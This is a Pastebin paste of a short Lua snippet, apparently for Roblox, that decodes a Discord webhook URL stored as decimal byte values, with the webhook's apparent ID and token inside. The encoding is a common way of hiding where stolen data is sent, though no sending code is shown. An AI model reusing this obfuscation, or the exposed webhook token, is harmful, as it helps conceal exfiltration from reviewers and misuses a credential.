Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local byteList = {
- 104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119,101,98,104,111,111,107,115,47,
- 49,51,55,57,54,55,49,51,52,53,50,54,56,50,54,52,57,54,48,47,122,57,115,118,54,121,113,114,119,79,114,115,114,81,86,116,
- 118,103,106,118,117,79,97,95,106,72,54,83,112,102,53,122,45,72,50,101,71,52,81,53,77,111,83,75,70,116,113,122,111,57,
- 72,53,105,98,101,56,104,119,79,54,55,120,50,102,85,109,80,75
- }
- local function decodeBytes(bytes)
- local str = ""
- for i = 1, #bytes do
- str = str .. string.char(bytes[i])
- end
- return str
- end
- local WEBHOOK_URL = decodeBytes(byteList)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement